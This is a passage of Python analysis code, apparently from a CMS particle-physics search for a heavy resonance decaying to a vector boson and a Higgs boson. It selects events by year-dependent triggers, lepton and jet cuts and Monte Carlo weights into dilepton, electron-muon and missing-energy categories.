self.MinJetMetDPhi = 10.
self.MaxJetNoFatJetBTag = -1.
self.BtagDeepB = -1.
self.DeepTagMD_H4qvsQCD = -1.
self.DeepTagMD_HbbvsQCD = -1.
self.DeepTagMD_ZHbbvsQCD = -1.
self.DeepTagMD_ZbbvsQCD = -1.
self.DeepTagMD_bbvsLight = -1.
self.DeepTagMD_WvsQCD = -1.
self.DeepTagMD_ZvsQCD = -1.
self.Mu1_pt = -1.
self.Mu1_eta = -1.
self.Mu1_phi = -1.
self.Mu1_mass = -1.
self.Mu1_pfIsoId = -1.
self.Mu1_relIso = -1.
self.Mu1_highPtId = -1.
self.Mu2_pt = -1.
self.Mu2_eta = -1.
self.Mu2_phi = -1.
self.Mu2_mass = -1.
self.Mu2_pfIsoId = -1.
self.Mu2_relIso = -1.
self.Mu2_highPtId = -1.
self.Ele1_pt = -1.
self.Ele1_eta = -1.
self.Ele1_phi = -1.
self.Ele1_mass = -1.
self.Ele2_pt = -1.
self.Ele2_eta = -1.
self.Ele2_phi = -1.
self.Ele2_mass = -1.
self.Ele_HEM15_16 = -1.
self.HT_HEM15_16 = -1.
self.HT = 0.
self.LHEScaleWeight = -1.
self.LHEPdfWeight = -1.
self.LHEWeight_originalXWGTUP = -1.
self.PrefireWeight = 1.
self.PrefireWeightUp = 1.
self.PrefireWeightDown = 1.
self.QCDNLO_Corr = 1.
self.QCDNNLO_Corr = 1.
self.EWKNLO_Corr = 1.
self.Jet1_VBF_pt = -1.
self.Jet1_VBF_eta = -1.
self.Jet1_VBF_phi = -1.
self.Jet1_VBF_mass = -1.
self.Jet2_VBF_pt = -1.
self.Jet2_VBF_eta = -1.
self.Jet2_VBF_phi = -1.
self.Jet2_VBF_mass = -1.
self.dijet_VBF_mass = -1.
self.deltaR_VBF = -1.
self.deltaR_HVBFjet1 = -1.
self.deltaR_HVBFjet2 = -1.
self.H_pt = -1.
self.H_eta = -1.
self.H_phi = -1.
self.H_mass = -1.
self.H_M = -1.
self.H_tau21 = -1.
self.H_tau41 = -1.
self.H_tau42 = -1.
self.H_tau31 = -1.
self.H_tau32 = -1.
self.H_ddt = -1.
self.H_csv1 = -1.
self.H_csv2 = -1.
self.H_deepcsv1 = -1.
self.H_deepcsv2 = -1.
self.H_dbt = -1.
self.H_chf = -1.
self.H_nhf = -1.
self.V_pt = -1.
self.V_eta = -1.
self.V_phi = -1.
self.V_mass = -1.
self.VH_deltaR = -1.
self.X_pt = -1.
self.X_eta = -1.
self.X_phi = -1.
self.X_mass = -1.
self.X_mass_chs = -1.
self.X_mass_nom = -1.
self.X_mass_jesUp = -1.
self.X_mass_jesDown = -1.
self.X_mass_jerUp = -1.
self.X_mass_jerDown = -1.
self.X_mass_MET_nom = -1.
self.X_mass_MET_jesUp = -1.
self.X_mass_MET_jesDown = -1.
self.X_mass_MET_jerUp = -1.
self.X_mass_MET_jerDown = -1.
self.H_mass_nom = -1.
self.H_mass_jmsUp = -1.
self.H_mass_jmsDown = -1.
self.H_mass_jmrUp = -1.
self.H_mass_jmrDown = -1.
eecutflow_list = []
mmcutflow_list = []
nncutflow_list = []
idx_electrons = []
idx_loose_electrons = []
idx_muons = []
idx_loose_muons = []
idx_fatjet = []
idx_jet = []
idx_jet_vbf = []
electrons_tlv_list = []
loose_electrons_tlv_list = []
muons_tlv_list = []
loose_muons_tlv_list = []
fatjet_tlv_list = []
jet_tlv_list = []
jet_tlv_list_vbf = []
fatjet_tau21_list = []
fatjet_tau41_list = []
fatjet_tau42_list = []
fatjet_tau31_list = []
fatjet_tau32_list = []
V = ROOT.TLorentzVector()
H = ROOT.TLorentzVector()
X = ROOT.TLorentzVector()
V_chs = ROOT.TLorentzVector()
######### cuts #########
elec1_pt_cut = 55.
elec2_pt_cut = 20.
elec_pt_cut = 10.
elec_eta_cut = 2.5
muon1_pt_cut = 55.
muon2_pt_cut = 20.
muon_pt_cut = 10.
muon_eta_cut = 2.4
tau_pt_cut = 18.
tau_eta_cut = 2.3
ak4_pt_cut = 30.
ak4_eta_cut = 2.4
fatjet_pt_cut = 200.
fatjet_eta_cut = 2.4
met_pt_cut = 250.
v_pt_cut = 200.
tau21_lowercut = 0.35
tau21_uppercut = 0.75
j_mass_lowercut = 30.
j_mass_uppercut = 250.
v_mass_lowercut = 65.
v_mass_intercut = 85.
v_mass_uppercut = 105.
h_mass_lowercut = 105.
h_mass_uppercut = 135.
x_mass_lowercut = 750.
xt_mass_lowercut = 650.
xjj_mass_lowercut = 950.
#### flag for year #######
if self.year == 2016:
self.is2016 = True
elif self.year == 2017:
self.is2017 = True
elif self.year == 2018:
self.is2018 = True
######### triggers #########
if self.year == 2016:
try:
trigger_SingleMu = any([event.HLT_Mu50,
event.HLT_TkMu50])
except:
trigger_SingleMu = event.HLT_Mu50
trigger_SingleEle = event.HLT_Ele115_CaloIdVT_GsfTrkIdT
trigger_SingleIsoEle = event.HLT_Ele27_WPTight_Gsf
trigger_SinglePhoton = event.HLT_Photon175
trigger_METMHTNoMu = any([event.HLT_PFMETNoMu110_PFMHTNoMu110_IDTight,
event.HLT_PFMETNoMu120_PFMHTNoMu120_IDTight,
event.HLT_MonoCentralPFJet80_PFMETNoMu120_PFMHTNoMu120_IDTight])
trigger_METMHT = any([event.HLT_PFMET110_PFMHT110_IDTight,
event.HLT_PFMET120_PFMHT120_IDTight])
trigger_MET = any([event.HLT_PFMET170_NotCleaned,
event.HLT_PFMET170_HBHECleaned])
elif self.year == 2017:
try:
trigger_SingleMu = any([event.HLT_Mu50,
event.HLT_TkMu100,
event.HLT_OldMu100])
except:
trigger_SingleMu = event.HLT_Mu50
try:
trigger_SingleEle = event.HLT_Ele115_CaloIdVT_GsfTrkIdT
except:
trigger_SingleEle = None
trigger_SingleIsoEle = event.HLT_Ele35_WPTight_Gsf
trigger_SinglePhoton = event.HLT_Photon200
try:
trigger_METMHTNoMu = any([event.HLT_PFMETNoMu110_PFMHTNoMu110_IDTight,
event.HLT_PFMETNoMu120_PFMHTNoMu120_IDTight,
event.HLT_PFMETNoMu130_PFMHTNoMu130_IDTight,
event.HLT_PFMETNoMu140_PFMHTNoMu140_IDTight,
event.HLT_MonoCentralPFJet80_PFMETNoMu120_PFMHTNoMu120_IDTight])
except:
trigger_METMHTNoMu = any([event.HLT_PFMETNoMu110_PFMHTNoMu110_IDTight,
event.HLT_PFMETNoMu120_PFMHTNoMu120_IDTight,
event.HLT_MonoCentralPFJet80_PFMETNoMu120_PFMHTNoMu120_IDTight])
trigger_METMHT = any([event.HLT_PFMET110_PFMHT110_IDTight,
event.HLT_PFMET120_PFMHT120_IDTight,
event.HLT_PFMET130_PFMHT130_IDTight,
event.HLT_PFMET140_PFMHT140_IDTight,
event.HLT_PFMETTypeOne110_PFMHT110_IDTight,
event.HLT_PFMETTypeOne120_PFMHT120_IDTight,
event.HLT_PFMETTypeOne130_PFMHT130_IDTight,
event.HLT_PFMETTypeOne140_PFMHT140_IDTight])
try:
trigger_MET = any([event.HLT_PFMET200_NotCleaned,
event.HLT_PFMET200_HBHECleaned,
event.HLT_PFMET200_HBHE_BeamHaloCleaned,
event.HLT_PFMET250_HBHECleaned])
except:
trigger_MET = None
elif self.year == 2018:
trigger_SingleMu = any([event.HLT_Mu50,
event.HLT_TkMu100,
event.HLT_OldMu100])
trigger_SingleEle = event.HLT_Ele115_CaloIdVT_GsfTrkIdT
trigger_SingleIsoEle = event.HLT_Ele32_WPTight_Gsf
trigger_SinglePhoton = event.HLT_Photon200
trigger_METMHTNoMu = any([event.HLT_PFMETNoMu110_PFMHTNoMu110_IDTight,
event.HLT_PFMETNoMu120_PFMHTNoMu120_IDTight,
event.HLT_PFMETNoMu130_PFMHTNoMu130_IDTight,
event.HLT_PFMETNoMu140_PFMHTNoMu140_IDTight,
event.HLT_MonoCentralPFJet80_PFMETNoMu120_PFMHTNoMu120_IDTight])
trigger_METMHT = any([event.HLT_PFMET110_PFMHT110_IDTight,
event.HLT_PFMET120_PFMHT120_IDTight,
event.HLT_PFMET130_PFMHT130_IDTight,
event.HLT_PFMET140_PFMHT140_IDTight,
event.HLT_PFMETTypeOne110_PFMHT110_IDTight,
event.HLT_PFMETTypeOne120_PFMHT120_IDTight,
event.HLT_PFMETTypeOne130_PFMHT130_IDTight,
event.HLT_PFMETTypeOne140_PFMHT140_IDTight])
trigger_MET = any([event.HLT_PFMET200_NotCleaned,
event.HLT_PFMET200_HBHECleaned,
event.HLT_PFMET200_HBHE_BeamHaloCleaned,
event.HLT_PFMET250_HBHECleaned])
########## Gen Weight #########
if self.isMC:
self.GenWeight = -1. if event.genWeight < 0 else 1.
self.PUWeight = self.puTool.getWeight(event.Pileup_nTrueInt)
self.EventWeight *= self.GenWeight
self.EventWeight *= self.PUWeight
for i,weight in enumerate(event.LHEScaleWeight):
self.out.LHEScaleWeight_hist.Fill(i,weight)
for j,weight in enumerate(event.LHEPdfWeight):
self.out.LHEPdfWeight_hist.Fill(j,weight)
self.LHEScaleWeight = event.LHEScaleWeight
self.LHEPdfWeight = event.LHEPdfWeight
self.LHEWeight_originalXWGTUP = event.LHEWeight_originalXWGTUP
self.out.events.Fill(0.,self.GenWeight)
self.out.original.Fill(0.,event.LHEWeight_originalXWGTUP)
if self.year == 2016 or self.year == 2017:
self.PrefireWeight = event.PrefireWeight
self.PrefireWeightUp = event.PrefireWeight_Up
self.PrefireWeightDown = event.PrefireWeight_Down
if self.isData and event.PV_npvs == 0:
return False
if not self.isData:
self.out.pileup.Fill(event.Pileup_nTrueInt)
if event.Pileup_nTrueInt == 0:
return False
########### FatJet #########
for ifatjet in range(event.nFatJet):
fatjet_pt = event.FatJet_pt[ifatjet]
fatjet_eta = event.FatJet_eta[ifatjet]
fatjet_phi = event.FatJet_phi[ifatjet]
fatjet_mass = event.FatJet_mass[ifatjet]
fatjet_jetid = event.FatJet_jetId[ifatjet]
fatjet_tlv = ROOT.TLorentzVector()
fatjet_tlv.SetPtEtaPhiM(fatjet_pt, fatjet_eta, fatjet_phi, fatjet_mass)
if fatjet_pt > fatjet_pt_cut and abs(fatjet_eta) < fatjet_eta_cut:
fatjet_tlv_list.append(fatjet_tlv)
idx_fatjet.append(ifatjet)
if event.FatJet_tau1[ifatjet]==0:
fatjet_tau21_list.append(0)
fatjet_tau41_list.append(0)
fatjet_tau31_list.append(0)
else:
fatjet_tau21_list.append(event.FatJet_tau2[ifatjet]/event.FatJet_tau1[ifatjet])
fatjet_tau41_list.append(event.FatJet_tau4[ifatjet]/event.FatJet_tau1[ifatjet])
fatjet_tau31_list.append(event.FatJet_tau3[ifatjet]/event.FatJet_tau1[ifatjet])
if event.FatJet_tau2[ifatjet]==0:
fatjet_tau42_list.append(0)
fatjet_tau32_list.append(0)
else:
fatjet_tau42_list.append(event.FatJet_tau4[ifatjet]/event.FatJet_tau2[ifatjet])
fatjet_tau32_list.append(event.FatJet_tau3[ifatjet]/event.FatJet_tau2[ifatjet])
self.nFatJets = len(fatjet_tlv_list)
#stop if no suitable Fatjet
if len(fatjet_tlv_list) == 0:
return False
########### electrons ##########
for ielectron in range(event.nElectron):
electron_pt = event.Electron_pt[ielectron]
electron_eta = event.Electron_eta[ielectron]
electron_phi = event.Electron_phi[ielectron]
electron_mass = event.Electron_mass[ielectron]
electron_tlv = ROOT.TLorentzVector()
electron_tlv.SetPtEtaPhiM(electron_pt,electron_eta,electron_phi,electron_mass)
if electron_eta > -2.5 and electron_eta < -1.479 and electron_phi > -1.55 and electron_phi < -0.9:
if self.Ele_HEM15_16 == -1.:
self.Ele_HEM15_16 = 0.
self.Ele_HEM15_16 += electron_pt
if electron_pt > elec_pt_cut and abs(electron_eta) < elec_eta_cut:
idx_electrons.append(ielectron)
electrons_tlv_list.append(electron_tlv)
if event.Electron_cutBased[ielectron] >= 2:
idx_loose_electrons.append(ielectron)
loose_electrons_tlv_list.append(electron_tlv)
self.nElectrons = len(loose_electrons_tlv_list)
########### muons #########
for imuon in range(event.nMuon):
muon_pt = event.Muon_pt[imuon]
muon_eta = event.Muon_eta[imuon]
muon_phi = event.Muon_phi[imuon]
muon_mass = event.Muon_mass[imuon]
muon_tlv = ROOT.TLorentzVector()
muon_tlv.SetPtEtaPhiM(muon_pt, muon_eta, muon_phi, muon_mass)
if muon_pt > muon_pt_cut and abs(muon_eta) < muon_eta_cut:
idx_muons.append(imuon)
muons_tlv_list.append(muon_tlv)
if event.Muon_isPFcand[imuon] and struct.unpack('B',event.Muon_pfIsoId[imuon])[0]>=2 and (event.Muon_isGlobal[imuon] or event.Muon_isTracker[imuon]):
idx_loose_muons.append(imuon)
loose_muons_tlv_list.append(muon_tlv)
self.nMuons = len(loose_muons_tlv_list)
############ taus #########
for itau in range(event.nTau):
tau_pt = event.Tau_pt[itau]
tau_eta = event.Tau_eta[itau]
tau_phi = event.Tau_phi[itau]
tau_mass = event.Tau_mass[itau]
tau_tlv = ROOT.TLorentzVector()
tau_tlv.SetPtEtaPhiM(tau_pt, tau_eta, tau_phi, tau_mass)
if tau_pt > tau_pt_cut and abs(tau_eta) < tau_eta_cut:
cleanTau = True
for loose_electrons_tlv in loose_electrons_tlv_list:
if loose_electrons_tlv.DeltaR(tau_tlv) < 0.4:
cleanTau = False
for loose_muons_tlv in loose_muons_tlv_list:
if loose_muons_tlv.DeltaR(tau_tlv) < 0.4:
cleanTau = False
if cleanTau:
self.nTaus += 1
############ MET ##########
METx = 0.
METy = 0.
MET_tlv = ROOT.TLorentzVector()
MET_tlv.SetPtEtaPhiE(event.PuppiMET_pt,0.,event.PuppiMET_phi, event.PuppiMET_pt)
############ TTbar pT reweighting ########
if self.isMC and 'TT' in self.sample[0]:
Top1_pt, Top2_pt = getTTPt(event)
self.TopWeight = getTTptWeight(Top1_pt, Top2_pt)
############ ZtoEE ############
self.out.eecutflow.Fill(0.,self.EventWeight)
eecutflow_list.append(self.EventWeight)
maxZpt = -1.
Z_pt = -1.
Z_m = -1.
goodelectronpair = False
for i in idx_electrons:
for j in idx_electrons:
if i==j or event.Electron_charge[i] == event.Electron_charge[j]:
continue
eli_tlv = ROOT.TLorentzVector()
eli_tlv.SetPtEtaPhiM(event.Electron_pt[i],event.Electron_eta[i],event.Electron_phi[i],event.Electron_mass[i])
eli_v = ROOT.TVector3()
eli_v.SetPtEtaPhi(event.Electron_pt[i],event.Electron_eta[i],event.Electron_phi[i])
elj_tlv = ROOT.TLorentzVector()
elj_tlv.SetPtEtaPhiM(event.Electron_pt[j],event.Electron_eta[j],event.Electron_phi[j],event.Electron_mass[j])
elj_v = ROOT.TVector3()
elj_v.SetPtEtaPhi(event.Electron_pt[j],event.Electron_eta[j],event.Electron_phi[j])
diel = eli_tlv + elj_tlv
Z_pt = diel.Pt()
Z_m = diel.M()
if Z_m > 70. and Z_m < 110. and Z_pt > maxZpt:
maxZpt = Z_pt
if eli_tlv.Pt() > elj_tlv.Pt():
el1 = i
el2 = j
el1_tlv = eli_tlv
el2_tlv = elj_tlv
el1_v = eli_v
el2_v = elj_v
else:
el1 = j
el2 = i
el1_tlv = elj_tlv
el2_tlv = eli_tlv
el1_v = elj_v
el2_v = eli_v
goodelectronpair = True
if goodelectronpair:
self.out.eecutflow.Fill(1.,self.EventWeight)
eecutflow_list.append(self.EventWeight)
if el1_tlv.Pt() > elec1_pt_cut and el2_tlv.Pt() > elec2_pt_cut:
self.out.eecutflow.Fill(2.,self.EventWeight)
eecutflow_list.append(self.EventWeight)
if event.Electron_cutBased[el1] >= 2 and event.Electron_cutBased[el2] >= 2:
self.out.eecutflow.Fill(3.,self.EventWeight)
eecutflow_list.append(self.EventWeight)
if maxZpt > v_pt_cut:
self.out.eecutflow.Fill(4.,self.EventWeight)
eecutflow_list.append(self.EventWeight)
if trigger_SingleEle == None:
if not trigger_SingleIsoEle and not trigger_SinglePhoton:
print "ZtoEE trigger inconsistency"
return False
else:
if not trigger_SingleEle and not trigger_SingleIsoEle and not trigger_SinglePhoton:
print "ZtoEE trigger inconsistency"
return False
#if not self.isMC and ("SinglePhoton" in self.sample[0] and (trigger_SingleEle or trigger_SingleIsoEle)):
# print "ZtoEE double counting"
# return False
self.out.eecutflow.Fill(5.,self.EventWeight)
eecutflow_list.append(self.EventWeight)
if self.isMC:
eltrig_tlv = el1_tlv
#for i in range(event.nTrigObj):
# if event.TrigObj_id[i] ==11:
# trigobj_v = ROOT.TVector3()
# trigobj_v.SetPtEtaPhi(event.TrigObj_pt[i],event.TrigObj_eta[i],event.TrigObj_phi[i])
# print "electron TrigObj_filterBits:",event.TrigObj_filterBits[i]
# if event.TrigObj_filterBits[i]==14336:
# #if event.TrigObj_filterBits[i]==1110000000000000:
# print "found matching electron"
# deltaR1 = trigobj_v.DeltaR(el1_v)
# deltaR2 = trigobj_v.DeltaR(el2_v)
# if deltaR2 < deltaR1 and deltaR2 < 0.2:
# eltrig_tlv = el2_tlv
# break
self.TriggerWeight = self.elSFs.getTriggerSF(eltrig_tlv.Pt(),eltrig_tlv.Eta())
self.TriggerWeightUp = self.elSFs.getTriggerSF(eltrig_tlv.Pt(),eltrig_tlv.Eta()) + self.elSFs.getTriggerSFerror(eltrig_tlv.Pt(),eltrig_tlv.Eta())
self.TriggerWeightDown = self.elSFs.getTriggerSF(eltrig_tlv.Pt(),eltrig_tlv.Eta()) - self.elSFs.getTriggerSFerror(eltrig_tlv.Pt(),eltrig_tlv.Eta())
self.LeptonWeight = self.elSFs.getIdIsoSF(el1_tlv.Pt(), el1_tlv.Eta())*self.elSFs.getIdIsoSF(el2_tlv.Pt(),el2_tlv.Eta())
IdIsoSF1 = self.elSFs.getIdIsoSF(el1_tlv.Pt(), el1_tlv.Eta())
IdIsoSF2 = self.elSFs.getIdIsoSF(el2_tlv.Pt(),el2_tlv.Eta())
IdIsoSF1error = self.elSFs.getIdIsoSFerror(el1_tlv.Pt(), el1_tlv.Eta())
IdIsoSF2error = self.elSFs.getIdIsoSFerror(el2_tlv.Pt(),el2_tlv.Eta())
self.LeptonWeight = IdIsoSF1*IdIsoSF2
LeptonWeightsigma = np.sqrt((IdIsoSF1error*IdIsoSF2)**2+(IdIsoSF2error*IdIsoSF1)**2)
self.LeptonWeightUp = self.LeptonWeight + LeptonWeightsigma
self.LeptonWeightDown = self.LeptonWeight - LeptonWeightsigma
if 'DYJetsToLL' in self.sample[0] or 'ZJetsToNuNu' in self.sample[0] or 'WJetsToLNu' in self.sample[0]:
GenVpt = getGenVpt(event)
self.QCDNLO_Corr = self.DYCorr.getWeightQCDNLO(GenVpt)
self.QCDNNLO_Corr = self.DYCorr.getWeightQCDNNLO(GenVpt)
self.EWKNLO_Corr = self.DYCorr.getWeightEWKNLO(GenVpt)
self.EventWeight *= self.QCDNLO_Corr * self.QCDNNLO_Corr * self.EWKNLO_Corr
self.EventWeight *= self.TriggerWeight
self.EventWeight *= self.LeptonWeight
V = el1_tlv + el2_tlv
self.Ele1_pt = el1_tlv.Pt()
self.Ele1_eta = el1_tlv.Eta()
self.Ele1_phi = el1_tlv.Phi()
self.Ele1_mass = el1_tlv.M()
self.Ele2_pt = el2_tlv.Pt()
self.Ele2_eta = el2_tlv.Eta()
self.Ele2_phi = el2_tlv.Phi()
self.Ele2_mass = el2_tlv.M()
self.isZtoEE = True
########## ZtoMM #############
self.out.mmcutflow.Fill(0.,self.EventWeight)
mmcutflow_list.append(self.EventWeight)
maxZpt = -1.
Z_pt = -1.
Z_m = -1.
goodmuonpair = False
for i in idx_muons:
for j in idx_muons:
if i==j or event.Muon_charge[i] == event.Muon_charge[j]:
continue
mui_tlv = ROOT.TLorentzVector()
mui_tlv.SetPtEtaPhiM(event.Muon_pt[i],event.Muon_eta[i],event.Muon_phi[i],event.Muon_mass[i])
mui_v = ROOT.TVector3()
mui_v.SetPtEtaPhi(event.Muon_pt[i],event.Muon_eta[i],event.Muon_phi[i])
muj_tlv = ROOT.TLorentzVector()
muj_tlv.SetPtEtaPhiM(event.Muon_pt[j],event.Muon_eta[j],event.Muon_phi[j],event.Muon_mass[j])
muj_v = ROOT.TVector3()
muj_v.SetPtEtaPhi(event.Muon_pt[j],event.Muon_eta[j],event.Muon_phi[j])
dimu = mui_tlv + muj_tlv
Z_pt = dimu.Pt()
Z_m = dimu.M()
if Z_m > 70. and Z_m < 110. and Z_pt > maxZpt:
maxZpt = Z_pt
if mui_tlv.Pt() > muj_tlv.Pt():
mu1 = i
mu2 = j
mu1_tlv = mui_tlv
mu2_tlv = muj_tlv
mu1_v = mui_v
mu2_v = muj_v
else:
mu1 = j
mu2 = i
mu1_tlv = muj_tlv
mu2_tlv = mui_tlv
mu1_v = muj_v
mu2_v = mui_v
goodmuonpair = True
if goodmuonpair:
self.out.mmcutflow.Fill(1.,self.EventWeight)
mmcutflow_list.append(self.EventWeight)
mu1_highPtId = struct.unpack('B',event.Muon_highPtId[mu1])[0]
mu2_highPtId = struct.unpack('B',event.Muon_highPtId[mu2])[0]
if mu1_tlv.Pt() > muon1_pt_cut and mu2_tlv.Pt() > muon2_pt_cut:
self.out.mmcutflow.Fill(2.,self.EventWeight)
mmcutflow_list.append(self.EventWeight)
if (mu1_highPtId >= 2 and mu2_highPtId >= 1) or (mu1_highPtId >= 1 and mu2_highPtId >= 2):
self.out.mmcutflow.Fill(3.,self.EventWeight)
mmcutflow_list.append(self.EventWeight)
if maxZpt > v_pt_cut:
self.out.mmcutflow.Fill(4.,self.EventWeight)
mmcutflow_list.append(self.EventWeight)
if not trigger_SingleMu:
print "ZtoMM trigger inconsistency"
return False
self.out.mmcutflow.Fill(5.,self.EventWeight)
mmcutflow_list.append(self.EventWeight)
if self.isMC:
if mu1_highPtId >=2:
mutrig_tlv = mu1_tlv
else:
mutrig_tlv = mu2_tlv
#for i in range(event.nTrigObj):
# if event.TrigObj_id[i] ==13:
# trigobj_v = ROOT.TVector3()
# trigobj_v.SetPtEtaPhi(event.TrigObj_pt[i],event.TrigObj_eta[i],event.TrigObj_phi[i])
# deltaR1 = trigobj_v.DeltaR(mu1_v)
# deltaR2 = trigobj_v.DeltaR(mu2_v)
# print "muon TrigObj_filterBits:",event.TrigObj_filterBits[i]
# if event.TrigObj_filterBits[i]==2048:
# #if event.TrigObj_filterBits[i]==10000000000:
# print "found matching muon"
# if deltaR2 < deltaR1 and deltaR2 < 0.2:
# mutrig_tlv = mu2_tlv
# break
self.TriggerWeight = self.muSFs.getTriggerSF(mutrig_tlv.Pt(),mutrig_tlv.Eta())
self.TriggerWeightUp = self.muSFs.getTriggerSF(mutrig_tlv.Pt(),mutrig_tlv.Eta()) + self.muSFs.getTriggerSFerror(mutrig_tlv.Pt(),mutrig_tlv.Eta())
self.TriggerWeightDown = self.muSFs.getTriggerSF(mutrig_tlv.Pt(),mutrig_tlv.Eta()) - self.muSFs.getTriggerSFerror(mutrig_tlv.Pt(),mutrig_tlv.Eta())
IdSF1 = self.muSFs.getIdSF(mu1_tlv.Pt(),mu1_tlv.Eta(),mu1_highPtId)
IdSF2 = self.muSFs.getIdSF(mu2_tlv.Pt(),mu2_tlv.Eta(),mu2_highPtId)
IsoSF1 = self.muSFs.getIsoSF(mu1_tlv.Pt(),mu1_tlv.Eta(),mu1_highPtId)
IsoSF2 = self.muSFs.getIsoSF(mu2_tlv.Pt(),mu2_tlv.Eta(),mu2_highPtId)
IdSF1error = self.muSFs.getIdSFerror(mu1_tlv.Pt(),mu1_tlv.Eta(),mu1_highPtId)
IdSF2error = self.muSFs.getIdSFerror(mu2_tlv.Pt(),mu2_tlv.Eta(),mu2_highPtId)
IsoSF1error = self.muSFs.getIsoSFerror(mu1_tlv.Pt(),mu1_tlv.Eta(),mu1_highPtId)
IsoSF2error = self.muSFs.getIsoSFerror(mu2_tlv.Pt(),mu2_tlv.Eta(),mu2_highPtId)
self.LeptonWeight = IdSF1*IdSF2*IsoSF1*IsoSF2
LeptonWeightsigma = np.sqrt((IdSF1error*IdSF2*IsoSF1*IsoSF2)**2+(IdSF2error*IdSF1*IsoSF1*IsoSF2)**2+(IsoSF1error*IdSF1*IdSF2*IsoSF2)**2+(IsoSF2error*IdSF1*IdSF2*IsoSF1)**2)
self.LeptonWeightUp = self.LeptonWeight + LeptonWeightsigma
self.LeptonWeightDown = self.LeptonWeight - LeptonWeightsigma
if 'DYJetsToLL' in self.sample[0] or 'ZJetsToNuNu' in self.sample[0] or 'WJetsToLNu' in self.sample[0]:
GenVpt = getGenVpt(event)
self.QCDNLO_Corr = self.DYCorr.getWeightQCDNLO(GenVpt)
self.QCDNNLO_Corr = self.DYCorr.getWeightQCDNNLO(GenVpt)
self.EWKNLO_Corr = self.DYCorr.getWeightEWKNLO(GenVpt)
self.EventWeight *= self.QCDNLO_Corr * self.QCDNNLO_Corr * self.EWKNLO_Corr
self.EventWeight *= self.TriggerWeight
self.EventWeight *= self.LeptonWeight
if mu1_tlv.DeltaR(mu2_tlv) < 0.3:
try:
self.Mu1_relIso = ((event.Muon_tkRelIso[mu1]*mu1_tlv.Pt()) - mu2_tlv.Pt())/mu1_tlv.Pt()
self.Mu2_relIso = ((event.Muon_tkRelIso[mu2]*mu2_tlv.Pt()) - mu1_tlv.Pt())/mu2_tlv.Pt()
except:
self.Mu1_relIso = -1.
self.Mu2_relIso = -1.
else:
try:
self.Mu1_relIso = event.Muon_tkRelIso[mu1]
self.Mu2_relIso = event.Muon_tkRelIso[mu2]
except:
self.Mu1_relIso = -1.
self.Mu2_relIso = -1.
V = mu1_tlv + mu2_tlv
self.Mu1_pt = mu1_tlv.Pt()
self.Mu1_eta = mu1_tlv.Eta()
self.Mu1_phi = mu1_tlv.Phi()
self.Mu1_mass = mu1_tlv.M()
self.Mu1_pfIsoId = struct.unpack('B',event.Muon_pfIsoId[mu1])[0]
self.Mu1_highPtId = struct.unpack('B',event.Muon_highPtId[mu1])[0]
self.Mu2_pt = mu2_tlv.Pt()
self.Mu2_eta = mu2_tlv.Eta()
self.Mu2_phi = mu2_tlv.Phi()
self.Mu2_mass = mu2_tlv.M()
self.Mu2_pfIsoId = struct.unpack('B',event.Muon_pfIsoId[mu2])[0]
self.Mu2_highPtId = struct.unpack('B',event.Muon_highPtId[mu2])[0]
self.isZtoMM = True
########### TtoEM #########
if not self.isZtoMM and not self.isZtoEE and self.nElectrons == 1 and self.nMuons == 1:
if event.Electron_charge[idx_loose_electrons[0]] != event.Muon_charge[idx_loose_muons[0]]:
el_tlv = loose_electrons_tlv_list[0]
mu_tlv = loose_muons_tlv_list[0]
if mu_tlv.Pt() > 30. and el_tlv.Pt() > 30.:
V = mu_tlv + el_tlv
if V.Pt() > 50.:
if trigger_SingleEle == None:
if not trigger_SingleIsoEle:
print "TtoEM trigger inconsistency"
return False
else:
if not trigger_SingleEle and not trigger_SingleIsoEle:
print "TtoEM trigger inconsistency"
return False
if self.isMC:
self.TriggerWeight = self.elSFs.getTriggerSF(el_tlv.Pt(),el_tlv.Eta())
self.LeptonWeight = self.elSFs.getIdIsoSF(el_tlv.Pt(), el_tlv.Eta())
if 'DYJetsToLL' in self.sample[0] or 'ZJetsToNuNu' in self.sample[0] or 'WJetsToLNu' in self.sample[0]:
GenVpt = getGenVpt(event)
self.QCDNLO_Corr = self.DYCorr.getWeightQCDNLO(GenVpt)
self.QCDNNLO_Corr = self.DYCorr.getWeightQCDNNLO(GenVpt)
self.EWKNLO_Corr = self.DYCorr.getWeightEWKNLO(GenVpt)
self.EventWeight *= self.QCDNLO_Corr * self.QCDNNLO_Corr * self.EWKNLO_Corr
self.EventWeight *= self.TriggerWeight
self.EventWeight *= self.LeptonWeight
self.Mu1_pt = mu_tlv.Pt()
self.Mu1_eta = mu_tlv.Eta()
self.Mu1_phi = mu_tlv.Phi()
self.Mu1_mass = mu_tlv.M()
self.Ele1_pt = el_tlv.Pt()
self.Ele1_eta = el_tlv.Eta()
self.Ele1_phi = el_tlv.Phi()
self.Ele1_mass = el_tlv.M()
self.isTtoEM = True
######### ZtoNN ##########
self.out.nncutflow.Fill(0.,self.EventWeight)
nncutflow_list.append(self.EventWeight)
if not self.isZtoMM and not self.isZtoEE and not self.isTtoEM:
if event.PuppiMET_pt > met_pt_cut :
self.out.nncutflow.Fill(1.,self.EventWeight)
nncutflow_list.append(self.EventWeight)
if self.nElectrons == 0 and self.nMuons == 0 and self.nTaus == 0:
self.out.nncutflow.Fill(2.,self.EventWeight)
nncutflow_list.append(self.EventWeight)
V.SetPtEtaPhiE(event.PuppiMET_pt,0.,event.PuppiMET_phi,event.PuppiMET_pt)
V_chs.SetPtEtaPhiE(event.MET_pt,0.,event.MET_phi,event.MET_pt)
if trigger_MET == None:
if not self.isMC and not trigger_METMHT and not trigger_METMHTNoMu:
print "ZtoNN Trigger inconsistency"
return False
else:
if not self.isMC and not trigger_MET and not trigger_METMHT and not trigger_METMHTNoMu:
print "ZtoNN Trigger inconsistency"
return False
self.out.nncutflow.Fill(3.,self.EventWeight)
nncutflow_list.append(self.EventWeight)
if self.filter(event) == False:
print "Bad event"
return False
self.out.nncutflow.Fill(4.,self.EventWeight)
nncutflow_list.append(self.EventWeight)
if self.isMC:
if 'DYJetsToLL' in self.sample[0] or 'ZJetsToNuNu' in self.sample[0] or 'WJetsToLNu' in self.sample[0]:
GenVpt = getGenVpt(event)
self.QCDNLO_Corr = self.DYCorr.getWeightQCDNLO(GenVpt)
self.QCDNNLO_Corr = self.DYCorr.getWeightQCDNNLO(GenVpt)
self.EWKNLO_Corr = self.DYCorr.getWeightEWKNLO(GenVpt)
self.EventWeight *= self.QCDNLO_Corr * self.QCDNNLO_Corr * self.EWKNLO_Corr
self.TriggerWeight = 1.
self.isZtoNN = True
#stop if no semileptonic decays
if self.isZtoEE==False and self.isZtoMM==False and self.isZtoNN==False and self.isTtoEM==False:
return False
########## setting the Higgs and V index #######
